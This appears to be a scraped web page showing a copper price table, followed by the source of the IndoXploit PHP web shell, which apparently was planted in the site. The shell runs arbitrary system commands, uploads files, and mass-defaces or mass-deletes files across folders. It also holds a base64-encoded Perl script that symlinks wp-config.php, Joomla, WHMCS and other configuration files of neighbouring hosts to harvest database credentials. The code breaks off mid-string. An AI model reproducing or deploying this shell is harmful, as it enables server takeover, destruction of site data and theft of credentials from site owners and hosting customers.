Slideshow image

Copper Rate

DateCash3MthStock
07/06/20164,725.004,742.00220,725

  IndoXploit
 ___________________________< root@indoxploit:~# w00t??? > ---------------------------            ,        ,           /(        )`            ___   / |            /- _  `-/  '           (//     /           / /   | `               O O   ) /    |           `-^--'`<     '          (_.)  _  )   /           `.___/`    /             `-----' /<----.     __ / __   <----|====O)))==) ) /====<----'    `--' `.__,'              |        |                     /        ______( (_  / ______      ,'  ,-----'   |              `--{__________)        /
IndoXploit".$perm."";} else {return "".$perm."";}}function r($dir,$perm) {if(!is_readable($dir)) {return "".$perm."";} else {return "".$perm."";}}function exe($cmd) {if(function_exists('system')) { @ob_start(); @system($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; } elseif(function_exists('exec')) { @exec($cmd,$results); $buff = ""; foreach($results as $result) { $buff .= $result; } return $buff; } elseif(function_exists('passthru')) { @ob_start(); @passthru($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; } elseif(function_exists('shell_exec')) { $buff = @shell_exec($cmd); return $buff; } }function perms($file){$perms = fileperms($file);if (($perms & 0xC000) == 0xC000) {// Socket$info = 's';} elseif (($perms & 0xA000) == 0xA000) {// Symbolic Link$info = 'l';} elseif (($perms & 0x8000) == 0x8000) {// Regular$info = '-';} elseif (($perms & 0x6000) == 0x6000) {// Block special$info = 'b';} elseif (($perms & 0x4000) == 0x4000) {// Directory$info = 'd';} elseif (($perms & 0x2000) == 0x2000) {// Character special$info = 'c';} elseif (($perms & 0x1000) == 0x1000) {// FIFO pipe$info = 'p';} else {// Unknown$info = 'u';}// Owner$info .= (($perms & 0x0100) ? 'r' : '-');$info .= (($perms & 0x0080) ? 'w' : '-');$info .= (($perms & 0x0040) ?(($perms & 0x0800) ? 's' : 'x' ) :(($perms & 0x0800) ? 'S' : '-'));// Group$info .= (($perms & 0x0020) ? 'r' : '-');$info .= (($perms & 0x0010) ? 'w' : '-');$info .= (($perms & 0x0008) ?(($perms & 0x0400) ? 's' : 'x' ) :(($perms & 0x0400) ? 'S' : '-'));// World$info .= (($perms & 0x0004) ? 'r' : '-');$info .= (($perms & 0x0002) ? 'w' : '-');$info .= (($perms & 0x0001) ?(($perms & 0x0200) ? 't' : 'x' ) :(($perms & 0x0200) ? 'T' : '-'));return $info;}function hdd($s) {if($s >= 1073741824)return sprintf('%1.2f',$s / 1073741824 ).' GB';elseif($s >= 1048576)return sprintf('%1.2f',$s / 1048576 ) .' MB';elseif($s >= 1024)return sprintf('%1.2f',$s / 1024 ) .' KB';elsereturn $s .' B';}function ambilKata($param, $kata1, $kata2){ if(strpos($param, $kata1) === FALSE) return FALSE; if(strpos($param, $kata2) === FALSE) return FALSE; $start = strpos($param, $kata1) + strlen($kata1); $end = strpos($param, $kata2, $start); $return = substr($param, $start, $end - $start); return $return;}function getsource($url) { $curl = curl_init($url); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true); curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false); $content = curl_exec($curl); curl_close($curl); return $content;}function bing($dork) {$npage = 1;$npages = 30000;$allLinks = array();$lll = array();while($npage <= $npages) { $x = getsource("http://www.bing.com/search?q=".$dork."&first=".$npage); if($x) {preg_match_all('#

ON" : "OFF";$ds = @ini_get("disable_functions");$mysql = (function_exists('mysql_connect')) ? "ON" : "OFF";$curl = (function_exists('curl_version')) ? "ON" : "OFF";$wget = (exe('wget --help')) ? "ON" : "OFF";$perl = (exe('perl --help')) ? "ON" : "OFF";$python = (exe('python --help')) ? "ON" : "OFF";$show_ds = (!empty($ds)) ? "$ds" : "NONE";if(!function_exists('posix_getegid')) {$user = @get_current_user();$uid = @getmyuid();$gid = @getmygid();$group = "?";} else {$uid = @posix_getpwuid(posix_geteuid());$gid = @posix_getgrgid(posix_getegid());$user = $uid['name'];$uid = $uid['uid'];$group = $gid['name'];$gid = $gid['gid'];}echo "System: ".$kernel."
";echo "User: ".$user." (".$uid.") Group: ".$group." (".$gid.")
";echo "Server IP: ".$ip." | Your IP: ".$_SERVER['REMOTE_ADDR']."
";echo "HDD: $used / $total ( Free: $freespace )
";echo "Safe Mode: $sm
";echo "Disable Functions: $show_ds
";echo "MySQL: $mysql | Perl: $perl | Python: $python | WGET: $wget | CURL: $curl
";echo "Current DIR: ";foreach($scdir as $c_dir => $cdir) {echo "
$cdir/";}echo "  [ ".w($dir, perms($dir))." ]";echo "
";echo "
";echo "";echo "
";echo "
";if($_GET['logout'] == true) {unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);echo "";} elseif($_GET['do'] == 'upload') {echo "
";if($_POST['upload']) {if($_POST['tipe_upload'] == 'biasa') {if(@copy($_FILES['ix_file']['tmp_name'], "$dir/".$_FILES['ix_file']['name']."")) {$act = "Uploaded! at $dir/".$_FILES['ix_file']['name']."";} else {$act = "failed to upload file";}} else {$root = $_SERVER['DOCUMENT_ROOT']."/".$_FILES['ix_file']['name'];$web = $_SERVER['HTTP_HOST']."/".$_FILES['ix_file']['name'];if(is_writable($_SERVER['DOCUMENT_ROOT'])) {if(@copy($_FILES['ix_file']['tmp_name'], $root)) {$act = "Uploaded! at $root -> $web";} else {$act = "failed to upload file";}} else {$act = "failed to upload file";}}}echo "Upload File:
Biasa [ ".w($dir,"Writeable")." ] home_root [ ".w($_SERVER['DOCUMENT_ROOT'],"Writeable")." ]
";echo $act;echo "
";} elseif($_GET['do'] == 'cmd') {echo "
".$user."@".$ip.": ~ $
";if($_POST['do_cmd']) {echo "
".exe($_POST['cmd'])."
";}} elseif($_GET['do'] == 'mass_deface') {function sabun_massal($dir,$namafile,$isi_script) {if(is_writable($dir)) {$dira = scandir($dir);foreach($dira as $dirb) {$dirc = "$dir/$dirb";$lokasi = $dirc.'/'.$namafile;if($dirb === '.') {file_put_contents($lokasi, $isi_script);} elseif($dirb === '..') {file_put_contents($lokasi, $isi_script);} else {if(is_dir($dirc)) {if(is_writable($dirc)) {echo "[DONE] $lokasi
";file_put_contents($lokasi, $isi_script);$idx = sabun_massal($dirc,$namafile,$isi_script);}}}}}}function sabun_biasa($dir,$namafile,$isi_script) {if(is_writable($dir)) {$dira = scandir($dir);foreach($dira as $dirb) {$dirc = "$dir/$dirb";$lokasi = $dirc.'/'.$namafile;if($dirb === '.') {file_put_contents($lokasi, $isi_script);} elseif($dirb === '..') {file_put_contents($lokasi, $isi_script);} else {if(is_dir($dirc)) {if(is_writable($dirc)) {echo "[DONE] $dirb/$namafile
";file_put_contents($lokasi, $isi_script);}}}}}}if($_POST['start']) {if($_POST['tipe_sabun'] == 'mahal') {echo "
";sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);echo "
";} elseif($_POST['tipe_sabun'] == 'murah') {echo "
";sabun_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']);echo "
";}} else {echo "
";echo "
Tipe Sabun:
BiasaMassal
Folder:

Filename:

Index File:

";}} elseif($_GET['do'] == 'mass_delete') {function hapus_massal($dir,$namafile) {if(is_writable($dir)) {$dira = scandir($dir);foreach($dira as $dirb) {$dirc = "$dir/$dirb";$lokasi = $dirc.'/'.$namafile;if($dirb === '.') {if(file_exists("$dir/$namafile")) {unlink("$dir/$namafile");}} elseif($dirb === '..') {if(file_exists("".dirname($dir)."/$namafile")) {unlink("".dirname($dir)."/$namafile");}} else {if(is_dir($dirc)) {if(is_writable($dirc)) {if(file_exists($lokasi)) {echo "[DELETED] $lokasi
";unlink($lokasi);$idx = hapus_massal($dirc,$namafile);}}}}}}}if($_POST['start']) {echo "
";hapus_massal($_POST['d_dir'], $_POST['d_file']);echo "
";} else {echo "
";echo "
Folder:

Filename:

";}} elseif($_GET['do'] == 'config') {$idx = mkdir("idx_config", 0777);$isi_htc = "Options FollowSymLinks MultiViews Indexes ExecCGInRequire NonenSatisfy AnynAddType application/x-httpd-cgi .cinnAddHandler cgi-script .cinnAddHandler cgi-script .cin";$htc = fopen("idx_config/.htaccess","w");fwrite($htc, $isi_htc);fclose($htc);if(preg_match("/vhosts|vhost/", $dir)) {$link_config = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);$vhost = "IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQpvcGVuZGlyKG15ICRkaXIgLCAiL3Zhci93d3cvdmhvc3RzLyIpOw0KZm9yZWFjaChzb3J0IHJlYWRkaXIgJGRpcikgew0KICAgIG15ICRpc0RpciA9IDA7DQogICAgJGlzRGlyID0gMSBpZiAtZCAkXzsNCiRzaXRlc3MgPSAkXzsNCg0KDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLXNob3AudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvb3MvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLXNob3Atb3MudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvb3Njb20vaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLW9zY29tLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL29zY29tbWVyY2UvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLW9zY29tbWVyY2UudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvb3Njb21tZXJjZXMvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLW9zY29tbWVyY2VzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3Nob3AvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLXNob3AyLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3Nob3BwaW5nL2luY2x1ZGVzL2NvbmZpZ3VyZS5waHAnLCRzaXRlc3MuJy1zaG9wLXNob3BwaW5nLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3NhbGUvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLXNhbGUudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYW1lbWJlci9jb25maWcuaW5jLnBocCcsJHNpdGVzcy4nLWFtZW1iZXIudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29uZmlnLmluYy5waHAnLCRzaXRlc3MuJy1hbWVtYmVyMi50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9tZW1iZXJzL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictbWVtYmVycy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jb25maWcucGhwJywkc2l0ZXNzLictNGltYWdlczEudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvZm9ydW0vaW5jbHVkZXMvY29uZmlnLnBocCcsJHNpdGVzcy4nLWZvcnVtLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2ZvcnVtcy9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictZm9ydW1zLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2FkbWluL2NvbmYucGhwJywkc2l0ZXNzLictNS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9hZG1pbi9jb25maWcucGhwJywkc2l0ZXNzLictNC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dwL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvV1Avd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLVdvcmRwcmVzcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93cC9iZXRhL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYmV0YS93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3ByZXNzL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy13cDEzLXByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dvcmRwcmVzcy93cC1jb25maWcucGhwJywkc2l0ZXNzLictd29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL1dvcmRwcmVzcy93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2Jsb2cvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLVdvcmRwcmVzcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93b3JkcHJlc3MvYmV0YS93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL25ld3Mvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLVdvcmRwcmVzcy1uZXdzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL25ldy93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLW5ldy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9ibG9nL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MtYmxvZy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9iZXRhL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MtYmV0YS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9ibG9ncy93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLWJsb2dzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvbWUvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLVdvcmRwcmVzcy1ob21lLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3Byb3RhbC93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLXByb3RhbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zaXRlL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3Mtc2l0ZS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9tYWluL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MtbWFpbi50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy90ZXN0L3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MtdGVzdC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9hcmNhZGUvZnVuY3Rpb25zL2RiY2xhc3MucGhwJywkc2l0ZXNzLictaWJwcm9hcmNhZGUudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYXJjYWRlL2Z1bmN0aW9ucy9kYmNsYXNzLnBocCcsJHNpdGVzcy4nLWlicHJvYXJjYWRlLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2pvb21sYS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWpvb21sYTIudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvcHJvdGFsL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictam9vbWxhLXByb3RhbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9qb28vY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb28udHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY21zL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictam9vbWxhLWNtcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zaXRlL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictam9vbWxhLXNpdGUudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvbWFpbi9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWpvb21sYS1tYWluLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL25ld3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb29tbGEtbmV3cy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9uZXcvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb29tbGEtbmV3LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvbWUvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb29tbGEtaG9tZS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy92Yi9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictdmJ+Y29uZmlnLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3ZiMy9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictdmIzfmNvbmZpZy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jYy9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictdmIxfmNvbmZpZy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9mb3J1bS9pbmNsdWRlcy9jbGFzc19jb3JlLnBocCcsJHNpdGVzcy4nLXZibHV0dGlufmNsYXNzX2NvcmUucGhwLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3ZiL2luY2x1ZGVzL2NsYXNzX2NvcmUucGhwJywkc2l0ZXNzLictdmJsdXR0aW5+Y2xhc3NfY29yZS5waHAxLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NjL2luY2x1ZGVzL2NsYXNzX2NvcmUucGhwJywkc2l0ZXNzLictdmJsdXR0aW5+Y2xhc3NfY29yZS5waHAyLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dobS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXdobTE1LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NlbnRyYWwvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG0tY2VudHJhbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93aG0vd2htY3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG0td2htY3MudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvd2htL1dITUNTL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictd2htLVdITUNTLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dobWMvV0hNL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictd2htYy1XSE0udHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvd2htY3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG1jcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zdXBwb3J0L2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictc3VwcG9ydC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zdXBwL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictc3VwcC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zZWN1cmUvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1zdWN1cmUudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc2VjdXJlL3dobS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXN1Y3VyZS13aG0udHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc2VjdXJlL3dobWNzL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictc3VjdXJlLXdobWNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NwYW5lbC9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWNwYW5lbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9wYW5lbC9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXBhbmVsLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3QvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1ob3N0LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3RpbmcvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1ob3N0aW5nLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3RzL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictaG9zdHMudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb29tbGEudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc3VibWl0dGlja2V0LnBocCcsJHNpdGVzcy4nLXdobWNzMi50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jbGllbnRzL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictY2xpZW50cy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jbGllbnQvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1jbGllbnQudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY2xpZW50ZXMvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1jbGllbnRlcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jbGllbnRlL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictY2xpZW50LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NsaWVudHN1cHBvcnQvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1jbGllbnRzdXBwb3J0LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2JpbGxpbmcvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1iaWxsaW5nLnR4dCcpOyANCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9tYW5hZ2UvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG0tbWFuYWdlLnR4dCcpOyANCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9teS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXdobS1teS50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvbXlzaG9wL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictd2htLW15c2hvcC50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaW5jbHVkZXMvZGlzdC1jb25maWd1cmUucGhwJywkc2l0ZXNzLictemVuY2FydC50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvemVuY2FydC9pbmNsdWRlcy9kaXN0LWNvbmZpZ3VyZS5waHAnLCRzaXRlc3MuJy1zaG9wLXplbmNhcnQudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3Nob3AvaW5jbHVkZXMvZGlzdC1jb25maWd1cmUucGhwJywkc2l0ZXNzLictc2hvcC1aQ3Nob3AudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL1NldHRpbmdzLnBocCcsJHNpdGVzcy4nLXNtZi50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc21mL1NldHRpbmdzLnBocCcsJHNpdG